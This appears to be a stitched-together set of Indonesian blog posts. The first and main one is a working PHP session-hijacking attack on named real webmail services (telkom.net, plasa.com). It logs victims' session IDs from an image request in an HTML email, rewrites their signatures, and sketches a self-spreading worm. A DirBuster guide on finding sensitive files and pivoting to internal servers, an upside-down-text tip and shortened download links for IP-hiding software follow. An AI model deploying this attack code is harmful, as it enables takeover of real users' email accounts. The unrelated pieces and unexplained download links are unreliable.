    $host = $url_tokens["host"];
    $tokens = explode("/",$ref);
    $sessid = $tokens[4];
    fwrite($file,"######\n");
    fwrite($file,"REFERER:".$_SERVER["HTTP_REFERER"]."\n");
    fwrite($file,"SESSID:".$sessid."\n");
     
    $urlhost = "http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&";
    $inboxhtml = file_get_contents($urlhost);
     
    preg_match('/<title>(.*?)<\/title>/i', $inboxhtml, $matches);
    $title=$matches[1];
    $email = $title;
    $pos = strpos($title," ");
    if ($pos > -1) {
    $email = substr($title,0,$pos);
    }
     
    fwrite($file,"KORBAN:".$email."\n");
    fwrite($file,"******\n");
    fclose($file);
     
    $image = ImageCreate($width, $height);
    $white = ImageColorAllocate($image, 255, 255, 255);
    $black = ImageColorAllocate($image, 0, 0, 0);
    $grey = ImageColorAllocate($image, 204, 204, 204);
    ImageFill($image, 0, 0, $black);
    ImageString($image, 3, 15, 5, $sessid, $white);
    ImageString($image, 3, 25, 25, $email, $white);
     
    // Writing Signature...
    $url = "http://mail.telkom.net/Session/$sessid/settings.wssp";
    if ($plasacom==true) {
     $url = "http://mail1.plasa.com/Session/$sessid/settings1.wssp";
    }
    $old_settings = file_get_contents($url);
    preg_match('/<textarea(.*?)>(.*?)<\/textarea>/i', $old_settings, $matches);
    $oldsig = $matches[2];
     
    $data = array();
    $data["UserFrom"] = $email;
    $newsig = "[YOUR EMAIL HAS BEEN HACKED]".$oldsig;
    $data["Signature"] = $newsig;
    $data["Update"] = "Update";
     
    $response = doPost($url,$data);
    if ((strpos($response,"Updated")>-1 && $telkomnet==true) || $plasacom==true) {
            ImageString($image, 3, 35, 50, "Signature anda berhasil diganti menjadi:" , $white);
            ImageString($image, 3, 45, 65, $newsig , $white);
    }
    header("Content-Type: image/jpeg");
    ImageJpeg($image);
    ImageDestroy($image);
     
    function doPost($url,$data) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            $response = curl_exec($ch);
            if(curl_errno($ch))
            {
                    $response = curl_error($ch);
            }
            curl_close($ch);
            return $response;
    }
    ?>
    Cara kerja script di atas adalah: Pada baris ke-3 isi header Referer diambil. Kemudian dibuat dan dibuka file daftarkorban.txt. File ini adalah log yang menyimpan daftar korban. Pada baris ke-22, session ID diambil dari header referer. Setelah session ID didapatkan kini script bisa mengubah signature korban, dengan cara mengirimkan POST request ke http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp, perhatikan baris ke-65. Setelah mengubah signature korban, pada baris ke-66 sampai baris ke-72, script membuat image dengan pesan “Signature anda berhasil diganti menjadi:”.
    Launch The Attack
    Oke, kini semua persiapan sudah siap. Kini saatnya kita melancarkan serangan dengan mengirimkan email html yang mengandung tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu (anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana email yang berisi jebakan dibuat dan ditujukan untuk korban.
    compose attack email
    compose attack email
    Dalam gambar tersebut email diisi dengan tag HTML IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible dengan memberikan atribut width dan src 0. Dengan membuat image menjadi invisible, korban tidak akan menyadari bahwa emailnya telah dibajak. Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini adalah isi tanda tangan (signature) email korban sebelum email dibuka.
    signature1
    Dan gambar berikut adalah gambar ketika email attacker tiba.
    email attacker tiba
    email attacker tiba
    Dan gambar berikut adalah gambar ketika email attacker dibuka oleh korban. Pada gambar tersebut terlihat bahwa session id korban dan pesan bahwa signature korban berubah tertulis dalam file image.jpg.
    victim open email and his session hijacked instantly
    victim open email and his session hijacked instantly
    Pada saat korban membuka email dari attacker, pada saat itu juga attacker menguasai penuh account email korban. Dalam contoh artikel ini attacker mengubah signature korban dengan menambahkan string [YOUR EMAIL HAS BEEN HACKED]. Berikut ini adalah gambar signature korban setelah korban membuka email attacker.
    signature2
    Worm Attack: More Dangerous Scenario
    Skenario serangan yang lebih berbahaya adalah bila attacker mengeksploitasi kelemahan ini untuk menciptakan worm. Ingat bahwa ketika attacker mendapatkan session ID, pada saat itu attacker memiliki power yang setara dengan korban. Dengan session korban, attacker bisa mengirimkan email serangan yang sama ke calon korban lain yang ada di dalam daftar buku alamat korban. Begitu teman korban membuka email itu, maka session dia juga dalam genggaman attacker dan dia juga akan menyebarkan serangan ke teman-temannya. Hal ini akan memicu reaksi berantai yang berbahaya.
    Sulitkah membuat worm seperti itu? Tidak sulit kok, mudah sekali. Semua itu tidak lebih dari kombinasi request GET dan POST dengan berbekal session ID korban. Attacker harus membaca phone book dengan mengirim request HTTP (GET/POST) dengan session ID korban. Setelah itu attacker akan mengirimkan email serangan ke teman-teman korban juga dengan melakukan request HTTP dengan session ID korban. Begitu seterusnya. Tidak sulit bukan, apalagi buat orang yang sudah sering memprogram.
    Tips Menghindari Serangan
    Karena serangan ini dilakukan dengan membajak session web, maka serangan ini hanya bisa dilakukan bila korban membaca email telkom.net dan plasa.com dengan webmail. Jadi agar terhindar dari serangan ini, gunakanlah akses POP3 atau IMAP untuk membaca email. Dengan menggunakan email client non-web seperti Thunderbird dan Outlook anda akan aman dari serangan ini.

    Berburu Direktori dan File Sensitif dengan DirBuster

    Mungkin anda akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi. Direktori Sensitif
    Semua direktori atau file yang mengandung informasi berguna buat hacker untuk mendeface website anda, maka direktori itu termasuk sensitif. Beberapa direktori atau file yang tergolong sensitif antara lain:
    • Backup
    Hal yang biasanya dibackup adalah database dan source script webnya. Bayangkan apa yang terjadi bila hacker berhasil mendapatkan seluruh file php dan “database dump” dalam satu file zip? Kalau anda berpikir itu tidak mungkin terjadi, anda salah besar, karena saya sering menemukan file backup berekstensi zip, tar.gz, atau sql berserakan di websitenya.
    • Halaman Login
    Ada banyak macam halaman login, umumnya adalah halaman login untuk mengelola isi website, yaitu CMS Administrator. Selain CMS, halaman login yang lain adalah phpMyAdmin, cpanel, Tomcat Admin Page, AXIS2 Admin Page dll. Tomcat dan AXIS2 adalah Java based webserver dan web service platform.
    Kenapa halaman login termasuk sensitif? Karena dengan mengetahui URL untuk menjadi Administrator website, seorang hacker bisa melakukan serangan SQL Injection, password guessing, dictionary attack dan brute force attack untuk membuat dirinya menjadi seorang administrator di website anda. Celakanya banyak website yang halaman login adminnya tidak menggunakan password yang kuat, bahkan menggunakan password default.
    • Log file
    Log file biasanya dipakai untuk tujuan debugging atau penelusuran kesalahan oleh web developer. Karena itu tidak heran bila dalam log file banyak mengandung informasi sensitif yang bisa dimanfaatkan hacker. File log ini berbeda-beda tergantung dari web aplikasi yang dipakai karena web developer punya kebebasan untuk membuat  atau tidak membuat file log.
    Salah satu contoh log file yang biasa ditemukan di web adalah WS_FTP.LOG, file ini dibuat oleh program WS_FTP, yaitu FTP Client. Setiap kali memakai program ini untuk upload ke web anda, WS_FTP akan otomatis memasukkan file WS_FTP.LOG ke dalam folder website anda. Dalam file WS_FTP.LOG ini seorang hacker bisa mendapatkan banyak informasi sensitif: antara lain IP address web server anda (banyak web yang menyembunyikan IP address sebenarnya dibalik NAT), full path lokasi document root web anda, username account hosting anda (bila dalam full path mengandung nama seperti /home/username/…./).
    WS_FTP.LOG juga bisa membocorkan isi sebuah direktori bila anda sudah mematikan fitur “Directory Indexing” atau membuat file index.html kosong. Seorang hacker yang tidak bisa melihat isi direktori karena directory index dimatikan atau ada file index.html kosong, bisa mencoba membuka WS_FTP.LOG di direktori itu. Bila ternyata file WS_FTP.LOG ada, maka file log itu akan membocorkan isi file dalam direktori tersebut.
    Pesan error di atas umumnya dijumpai pada direktori yang ada, tapi directory indexing tidak diaktifkan, sehingga anda harus menebak nama file yang ada di direktori tersebut. Bila directory indexing diaktifkan, maka anda akan menemukan halaman dengan title “Index of /”.
    • Versi Lama
    Terkadang ketika sebuah website diupdate ke versi baru, file-file script lama disimpan dalam satu direktori bernama oldversion, version1 dan versi barunya dalam direktori /new/ atau /ver2/ atau /beta/. Menemukan beragam versi suatu web adalah kesempatan emas untuk menemukan celah keamanan karena biasanya web versi terbarunya memang tidak mengandung kelemahan, namun bila kita berhasil menemukan versi lamanya, akan ditemukan banyak celah keamanan.
    Saya pernah menemukan sebuah website yang securitynya bagus, saya tidak menemukan vulnerability di sana, namun ternyata dia lupa membuang versi lama dari web tersebut. Namun ternyata web versi lama yang mengandung banyak bug dari SQL injection sampai local file injection masih bisa diakses di direktori lain. Walaupun web versi terbaru securitynya bagus, namun jadi tidak berarti apa-apa karena hacker bisa menyerang dari web versi lamanya.
    Berburu Direktori dan File Sensitif
    Nama direktori atau file bisa ditemukan dengan 2 cara:
    • Crawling
    Crawling ini adalah cara yang dipakai oleh search engine untuk mendapatkan isi website anda.  Ini adalah cara yang “sopan”, karena kita hanya mencari apa yang memang disediakan oleh pemilik webnya. Search engine crawling akan mengikuti direktori apa yang boleh dan apa yang tidak boleh diambil dalam file /robots.txt. Jadi bila ada direktori sensitif yang bisa di-search di Google, maka itu terjadi karena di suatu situs ada pointer ke obyek itu berupa link. Bila di seluruh jagat internet ini tidak ada satupun link ke direktori itu, maka tidak mungkin direktori itu muncul di Google.
    Kita bisa memanfaatkan Google Hacking untuk mencari direktori sensitif yang sengaja atau tidak sengaja ter-index oleh Google. Kita juga bisa membuat script atau memakai program semacam wget untuk melakukan crawling website  (tidak memanfaatkan Google index). Menjalankan crawler sendiri terkadang diperlukan bila kita ingin melakukan crawling direktori yang search engine dilarang untuk masuk (diblacklist di /robots.txt).
    • Guessing
    Bila dengan cara sopan tidak mendapatkan direktori sensitif, maka kita terpaksa pakai cara “kasar”. Mendapatkan direktori sensitif dengan cara ini sama dengan menebak password. Ada dua cara yang bisa dipakai:
    1. Pure Brute Force Attack
    2. Cara ini adalah cara yang paling kasar. Kita mencoba semua kemungkinan kata yang muncul dari huruf , angka dan karakter lain sebagai nama direktori atau nama file. Contoh: request /aa/, lalu /ab/, lalu /ac/, lalu /ad/, demikian seterusnya sampai semua kemungkinan yang ada dicoba. Cara ini membutuhkan waktu yang sangat lama, jadi kurang efektif. Tapi kelebihannya adalah tidak ada direktori yang lolos, karena semua kemungkinan akan dicoba.
    3. Dictionary Attack
    4. Ini adalah cara yang lebih sopan dibanding pure brute force. Kita menggunakan kamus, yaitu kumpulan nama yang akan kita pakai untuk request ke web server. Efektif tidaknya cara ini tergantung dari bagaimana kualitas kamus yang dipakai. Semakin baik kualitas kamusnya, semakin besar kemungkinan berhasil mendapatkan direktori sensitif. Kamus yang baik adalah kamus berisi kata yang memang benar-benar pernah dipakai untuk nama direktori, jadi bukan nama fiktif atau karangan.
    DirBuster dari OWASP
    Dalam artikel ini saya akan menggunakan tools gratisan, DirBuster yang dibuat oleh OWASP (Open Web Application Security Project), sebuah kelompok non-profit yang berfokus pada keamanan web. Seperti yang sudah saya katakan sebelumnya, kekuatan tools semacam ini tergantung pada kualtias kamus yang dimilikinya.
    DirBuster memiliki kamus yang sangat lengkap, bukan nama fiktif yang tidak pernah dipakai, tapi memang benar-benar nama yang pernah dipakai sebagai nama direktori. Kumpulan nama ini didapatkan dari internet dengan cara melakukan crawling terhadap situs-situs internet lalu mengelompokkannya. Kumpulan nama yang dipakai minimal 3 situs berbeda ditaruh di file dengan akhiran small.txt, kumpulan nama yang dipakai minimal 2 situs berbeda ditaruh di file dengan akhiran medium.txt, dan semua nama yang ditemukan ditaruh dalam file berakhiran big.txt.
    Bila anda membutuhkan daftar nama direktori saja untuk dipakai di program lain, anda juga bisa mendownload kamusnya saja tanpa harus mendownload DirBuster.
    Tools ini sangat mudah digunakan, jadi silakan saja langsung download DirBuster. Sebelumnya pastikan dulu komputer anda sudah terinstall Java, karena tools ini dibuat dengan Java.
    Scanning Type
    Ada dua jenis scanning yang bisa dilakukan, pure brute force atau dictionary based attack. Bila anda memilih memakai teknik pure brute force, maka anda harus menentukan character set (kumpulan karakter) yang akan dijadikan nama direktori dan tentukan juga panjang minimal dan maksimalnya. Semakin besar populasi dari character set yang anda pilih dan semakin panjang max length yang anda pilih, semakin besar kumpulan kata yang dihasilkan, itu artinya dibutuhkan waktu yang semakin lama untuk mencoba semuanya. Gambar di bawah ini adalah screenshot ketika memilih pure brute force.
    Bila memilih list based brute force, maka kita harus memilih file berisi daftar nama direktori. DirBuster sudah menyediakan banyak dictionary yang bisa dipilih sesuai kebutuhan:
    • directory-list-2.3-small.txt  (87650 words) : Minimal dipakai di 3 situs berbeda.
    • directory-list-2.3-medium.txt  (220546 words) : Minimal dipakai di 2 situs berbeda.
    • directory-list-2.3-big.txt  (1273819 words) : Minimal pernah dipakai.
    • directory-list-lowercase-2.3-small.txt  (81629 words) : Versi case insensitive dari directory-list-2.3-small.txt
    • directory-list-lowercase-2.3-medium.txt  (207629 words) : Versi case insensitive dari directory-list-2.3-medium.txt
    • directory-list-lowercase-2.3-big.txt  (1185240 words) : Versi case insensitive dari directory-list-2.3-big.txt
    • directory-list-1.0.txt  (141694 words)  : Daftar awalnya, tidak terurut
    • apache-user-enum-1.0.txt  (8916 usernames) : Dipakai untuk user enumeration, mendapatkan valid username di sebuah server
    • apache-user-enum-2.0.txt  (10341 usernames) : Dipakai untuk user enumeration
    Dalam list yang disediakan DirBuster juga menyediakan daftar username yang dipakai untuk user enumeration, yaitu mendapatkan nama user yang valid di sebuah server. Dalam web server Apache yang mengaktifkan mod_userdir, bisa dilakukan user enumeration dengan cara menggunakan ~namauser sebagai nama direktori.
    Gambar di bawah ini adalah screenshot ketika kita memilih menggunakan dictionary attack.
    Starting Options
    Pilihan lain yang harus dipilih adalah starting options, yaitu di mana titik mulainya DirBuster mencari direktori. Pilihannya adalah standard start point, atau URL Fuzz. Standard start point adalah pilihan yang paling banyak digunakan karena pilihan ini berarti kita meminta DirBuster untuk menggunakan nama direktori sebagai titik awal.
    Pilihan yang ada ketika kita memilih Standard Start Point adalah checkbox Brute Force Dirs yang bisa dimatikan bila kita tidak ingin ingin membrute Direktori. Brute Force Files bisa dimatikan bila kita tidak ingin mencari file. Dua pilihan tersebut bisa diatur sesuai kebutuhan, apakah ingin mencari direktori dan nama file, atau direktori saja, atau nama file saja.
    Pilihan File extention bisa diisi dengan ekstensi file yang ingin dicari, misalnya bisa kita isi dengan php, zip, gz, tar.gz. Namun bila kita tidak ingin menggunakan ekstensi, kita bisa centang pilihan Use Blank Extention.
    Pilihan Be Recursive digunakan untuk membuat DirBuster melakukan pencarian secara mendalam (Deep First Search), yaitu mencari subdirektori dalam sebuah direktori, mencari sub-subdirektori dalam subdirektori dan seterusnya sampai kedalaman tertentu.
    Ada kalanya kita harus membrute force nama direktori yang merupakan bagian dari parameter URL. Dalam kasus seperti itu kita bisa memakai pilihan URL Fuzz. Salah satu contoh kasusnya adalah ketika kita ingin melakukan scanning melalui sebuah web based proxy seperti PHPProxy.
    Ketika kita ingin scanning website internal dengan IP address private dari website public yang sudah berhasil kita susupi, kita bisa gunakan PHProxy. URL PHProxy biasanya berbentuk http://somewebsite/myproxy/?q=http://situstarget/{dir}. Dalam kasus seperti ini, pilihan URL Fuzz bisa sangat berguna. Gambar di bawah ini menunjukkan skenario tersebut. Setelah seorang hacker berhasil menguasai web server public, dia akan mengupload web based proxy seperti PHProxy. Dengan proxy tersebut hacker bisa melebarkan serangannya ke arah dalam dengan menyerang web server internal yang tidak bisa dijangkau dari internet.
    Walaupun tools ini sangat sederhana, tapi jangan remehkan keampuhannya. Silakan coba saja sendiri, mungkin nanti anda akan terkejut melihat banyaknya webmaster yang sembrono menaruh file/direktori sensitif di websitenya.

    Cara Buat Tulisan Kebalik secara Offline | Online


    Mungkin Sobat Pernah Baca Artikel di Blog lain tentang Cara Buat Tulisan Terbalik | Kebalik | Nungging. Tapi itu semua dilakukan Secara Online dan Harus terkoneksi internet, dan awal-awal saya posting diblog ini pernah menulis Artikel ini, Baca disini : Cara Buat tulisan Terbalik secara Online.
    Kali ini saya akan memperkenalkan Cara buat tulisan terbalik secara Offline jadi tanpa perlu koneksi internet sobat bisa juga but Tulisan Terbalik, dan ini sangat mudah.
    Lalu Bagaimana Trik buatnya?, disini kita akan menggunakan Script yang bisa sobat Download Disini : Script Tulisan SMS Kebalik
    Hasilnya seperti ini
     " ɐpuɐ uɐƃunɾunʞ sɐʇɐ ɥısɐʞ ɐɯıɹǝʇ ˙˙˙˙ɯoɔ˙ɐɹɐɔ uɐןndɯnʞ ıp ƃuɐʇɐp ʇɐɯɐןǝs ˙˙˙ɐʇuıɔɹǝʇ ɹǝƃƃoןq ʇɐqos oooןɐɥ "

    " Halooo sobat Blogger Tercinta... Selamat datang di Kumpulan Cara.Com.... Terima Kasih atas Kunjungan Anda "
    Cara ini Juga Bisa digunakan untuk :
    Buat | Bikin SMS Terbalik | Kebalik .... Cara Buat SMS Terbalik
    Ini akan Membuat teman2 yang Anda kirimkan SMS mesti Membalikkan Handphone nya... Jail dikit ga apa kan??... Buruan Kerjain Sobat atau dengan SMS Kebalik..
    Caranya :
    • Sobat Mesti koneksi HP dengan Kompi atau Laptop
    • Gunakan PC Suite, kebetulan saya pakai n70, pada Menu Nokia PC Suite silahkan Klik Pesan.
    • Tunngu beberapa saat untuk koneksinya.
    • Silahkan Buat Dulu Tulisan Kebaliknya dengan Script yang sobat download tadi
      Contoh :˙˙˙ɹɐqʞ ɐdɐ˙˙˙ƃuɐʎɐs ooןɐɥ

    • Silahkan Kembali lagi Ke Pc Suite Sobat dimana tadi kita ada pada menu Pesan, Sekarang Klik Tulis Pesan Copy Pastekan Tulisan Kebalik Sobat
    • Tunggu Beberapa saat.... Pesan Terkirim
    • Respon Pacar Anda ...???? Puyeng..mesti ngebalik HP

    Software Untuk sembunyikan IP

    Apakah Anda sadar bahwa alamat IP Anda terkena setiap kali Anda mengunjungi sebuah website? Apakah Anda tahu bahwa banyak situs dan hacker menggunakan alamat IP Anda untuk memonitor alamat rumah Anda dan informasi pribadi lainnya? Sembunyikan IP Asli memungkinkan Anda untuk berselancar secara anonim, menyimpan alamat IP yang tersembunyi, melindungi informasi pribadi Anda terhadap hacker dan menyediakan enkripsi penuh aktivitas online Anda, semua dengan mudah klik tombol.
    Mengapa Harus Sembunyikan IP anda Ketika melakukan koneksi ke Internet, komputer (atau router jaringan)?
    Ini semua karena alamat IP ditransmisikan dan dicatat dalam file log disimpan pada server tersebut. Log akses meninggalkan jejak aktivitas Internet Anda. Hal ini sangat diperlukan untuk menyembunyikan alamat IP asli Anda, jika Anda tidak ingin dilacak oleh orang lain. Bagaimana Sembunyikan My IP Dengan hanya satu klik,  surfing anonim, amankan semua protokol pada PC Anda,

    Fitur Utama
    • Sembunyikan Alamat IP Asli Anda dan Gunakan Alamat IP Palsu dari berbagai negara untuk menyembunyikan IP asli Anda.
    • Anonymous Web Surfing Surf anonim dengan IP palsu, kapanpun Anda mau.
    • Melindungi Identitas Anda Terhadap Hacker, Melindungi Anda dari hacker dan pencuri identitas yang akan tertipu oleh IP palsu Anda. 
    • Sembunyikan Diri dari Forum atau situs yang Dibatasi Estat IP , memungkinkan Anda untuk mengakses setiap forum, blog atau website yang pernah Membanned Anda.
    • Mencegah Website dengan Pelacakan Aktivitas Online Anda .Sembunyikan IP asli Anda ketika Anda surfing Internet untuk mencegah Anda dilacak oleh situs.
    • Sistem Operasi Windows 2000/XP/Vista/7 (32-bit dan 64-bit)

    Sialhkan Download Disini :  http://goo.gl/eapLe    Atau disini  http://goo.gl/Km2VY